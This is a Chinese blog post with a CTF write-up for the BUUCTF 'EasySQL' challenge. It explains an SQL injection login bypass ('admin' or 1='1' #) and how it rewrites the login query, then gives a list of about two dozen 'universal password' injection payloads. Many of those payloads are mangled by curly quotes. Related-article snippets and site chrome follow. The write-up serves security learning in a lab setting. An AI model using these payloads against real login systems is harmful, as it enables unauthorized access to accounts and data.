Web安全之路-BUUCTF-[极客大挑战 2019] EasySQL 1

最新推荐文章于 2023-10-29 03:47:06 发布
最新推荐文章于 2023-10-29 03:47:06 发布
阅读量113 收藏 1
点赞数
分类专栏: 网络安全 文章标签: web安全 安全 java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_47039080/article/details/133808776
版权

Web安全之路-BUUCTF-[极客大挑战 2019] EasySQL 1

题目来源:BUFFCTF - [极客大挑战 2019] EasySQL 1

思路的是简单的SQL万能密码的使用!

解题:

在这里插入图片描述

构造:admin’ or 1=‘1’ #

在这里插入图片描述

解题思路

首先输入:1’;
在这里插入图片描述使得基本可以判断出内部的sql语句为:
select * from user where username=$_GET[‘username’] and password= $_GET[‘password’]
输入:1’;
将语句变换为:select * from user where username = ‘1’; and passeord=‘123’’

构造语句:admin’ or 1=‘1’ #
sql语句变为: select * from user where username = ‘admin’ or 1= ‘1’ # and passeord = ‘123’
#会过滤后面的字符串,相关的还有 – 可以依次尝试
使得ql语句变为:select * from user where username = ‘admin’ or 1= ‘1’
登录成功

相关资料

’ or 1=‘1’ #
'or 1=1/*
'or 1=1–
'or 1=1/*
‘or’ ‘1’=‘1’
‘or’’ =’
‘or’’ =’‘or’’=’
‘or’ =‘1’
‘or’ =‘or’
'or.‘a.’='a
1’ or’1’='1
a’ or’1=1–
or ‘a’=‘a’
or 1=1–
'or 1=1/*
"or “a”="a
“or 1=1–
“or”=”
“or” ="a’='a
“or 1=1–
“or =or”
'‘or’ =‘or’
') or (‘a’='a
‘.).or.(’.a.’=’.a
'or 1=1
‘or”="a’='a

原来是小浣熊啊
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF在线测评之[极客挑战 2019]EasySQL 1
weixin_49182737的博客
03-03 5384
启动靶机 只给了一个地址,点击进去即是靶机 可以看到这是一个登录页面 虽然靶机信息那已经提示我们这是一个EasySql,结合靶机页面是登录页面,把八九不离十的可以确定这一题是考察SQL注入的,并且Easy提示我们,是简单的sql注入。 BUT出于一个网安爱好者的心态,我们还是要简单看一下这个页面的信息,说不定出题者挖坑呢 。。。 虽然结果是然并卵 所以还是老老实实听提示试sql注入吧 这里安利一下firefox,这浏览器可以在拓展里装Hackbar,一款房间寻找web安全bug的插件 一个不太好的信息时
勇士的奇妙大冒险之几何炼金 - 洋葱数学极客挑战赛最佳创意奖.zip
最新发布
04-23
勇士的奇妙大冒险之几何炼金 - 洋葱数学极客挑战赛最佳创意奖
GFG-:极客极客30天挑战
02-17
玻璃纤维 极客30天挑战2021年1月 30天练​​习问题的Python解决方案: 与同学一起翻阅怪胎。(Array); 第N个自然数; 不能表示为Sum的最小正整数; 从抽屉里拿出“ k”双袜子的最小采摘次数; 螺旋矩阵奇克兰的硬币; 有效对和; 糖果坝; 变形重复字符串匹配; 秘密密码; 位差; 检查树遍历; 统治对; 计数三胞胎; 限制性糖果粉碎; 帮助同学; 132怪异建筑; 限制吃豆子; 情人节; 电晕疫苗; BST的最短范围; 露西的邻居;
Buuctf-Web-[极客挑战 2019]EasySQL 1 题解及思路总结
m0_62239233的博客
09-16 7744
SQL注入。
BUUCTF-[极客挑战 2019]EasySQL1
Monica的博客
09-04 1488
目录 题目: 知识点: 分析: 题目: 知识点: mysql 中and和or的优先级 ()> and > or sql="select * from DB where user_id=1 or user_name='张三'and birthday='2000-03-03'" 1.该条sql 表示从 DB 中查询出user_id =1 或者 (user_name='张三'并且 birthday='2000-03-03') 的数据 sql="select...
BUUCTF[极客挑战 2019] EasySQL 1
m0_75178803的博客
06-12 4004
因为这道题是基于sql单引号的注入,我们构造万能密码,#在sql注入中是注释符。题目来源:BUUCTF [极客挑战 2019] EasySQL 1。用or连接,因为1=1恒真,假或真=真,真或真=真,所以这个语句恒成立。输入 1' union select 1,2,3。查看报错信息发现是基于单引号的注入。由一道题简单引出万能密码的知识点。这是查询数据库可能会用到的句型。只有当输入1’时,页面报错。直接在用户名或者密码区输入。只有当列名字段数为3时,
BUUCTF: [极客挑战 2019]EasySQL 1
anyhowanywhere的博客
09-26 633
[极客挑战 2019]EasySQL 1
CTF学习第十站——BUUCTF[极客挑战 2019]EasySQL1
qq_41174589的博客
10-09 148
确认输入的账号密码是否正确是访问数据库的过程,只要表达式的返回值为真则可以访问。如果输入的SQL语句有错,会出现如下界面。抓包后我们发现,该网页的请求方式为GET。尝试使用SQL万能密码,得到flag。根据题目名称,此题主要考SQL语句。尝试输入常见用户名密码并抓包。表达式1=1的返回值为真。
BUUCTF题解之[极客挑战 2019]EasySQL 1
jungleirim的博客
10-17 344
SQL注入是一种针对Web应用程序的攻击技术,通过在应用程序的用户输入参数中嵌入SQL代码,进而攻击应用程序的数据库。攻击者可以通过SQL注入来获取敏感信息、执行无权执行的操作、甚至完全控制数据库服务器。SQL注入通常发生在Web应用程序中,因为Web应用程序使用输入参数来构建SQL语句,而这些输入参数往往不能被完全信任。攻击者可以利用这些输入参数来注入恶意代码,进而执行攻击。
GeekBand-IOS-1501-SampleProject:极客班IOS专业样本项目资源库
04-30
GeekBand-IOS-1501-SampleProject极客班IOS专业样本项目资源库为了推进项目实践,极客班将推出样本项目(蓦然)的Lab Manual帮助学员实践一个APP的开发。项目讨论区:更新日志:2015/09/23 蓦然LabManual_登录模块_...
HBuilder-飞速编码的极客工具,手指爽,眼睛爽
01-12
HBuilder-飞速编码的极客工具,手指爽,眼睛爽
BUUCTF [SUCTF 2019]EasySQL1 做题笔记/心得(自留)
m0_74449411的博客
10-29 243
本篇并不作为一篇write up,仅记录自己的部分观点以及思考过程,此题在该站上已经有了许多优质题解,大家可以先去熟悉题目以及解法思路之后再来阅读该篇文章,而笔者作为一名web新人,基础较差,很多地方看待问题存在钻牛角尖以及常识缺乏问题,欢迎大家提议讨论,在不久的将来如果实力成熟,也会再次回过头来回顾自己如今的思考过程以及产生误区的原因进行分析。
Buuctf web [SUCTF 2019]EasySQL
m0_61903191的博客
09-13 1127
又是一道考察sql注入的题。
BUUCTFEasySQL 1】
m0_69119863的博客
03-16 270
②Post传入参数后显示在url上,经过url编码空格被转义为'+' (基于 RFC-1738标准);JS使用的编码标准为RFC-2396,将空格转义为%20。输入用户名和密码,登录后参数显示在url地址栏上,在admin后加 ' 或"判断是字符型还是数字型,根据回显结果得知是字符型且闭合方式为单引号闭合。①标准的url上不能有空格,可用编码%20替代。按F12+Fn查看网页源代码,没有得到什么信息。使用万能密码 ' or 1=1#
BUUCTF-[SUCTF 2019]EasySQL1
Monica的博客
09-09 2507
题目: 分析: 先尝试输入。 输入非0数字的时候会有一个回显 输入大小写字母的时候没有回显 判断是什么闭合:输入1#能输出,而输入 1' 和1'#没有输出,"被过滤掉,大致上可以按照数字型进行猜测。 输入特殊字符也没有报错回显,所以报错注入基本上没戏了 输入很多关于sql语句的东西(and,or,union,if,order from )都会显示Nonono,所以联合查询也没戏 再尝试时间盲注 ,sleep也被ban了,时间盲注也不行 再尝...
buuctf web 极客挑战2019
08-24
嗨!对于BUUCTF Web极客挑战2019,我了解到它是一个网络安全比赛,由北方工业大学举办。这个比赛旨在考察参赛者的网络攻防能力和Web漏洞挖掘技术。比赛的题目涵盖了Web安全的各个方面,包括但不限于漏洞利用、代码审计和网络协议等。参赛者需要通过解决各个题目来获取相应的flag,以证明自己的能力。如果你有具体的问题或需要更详细的信息,我会尽力帮助你。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值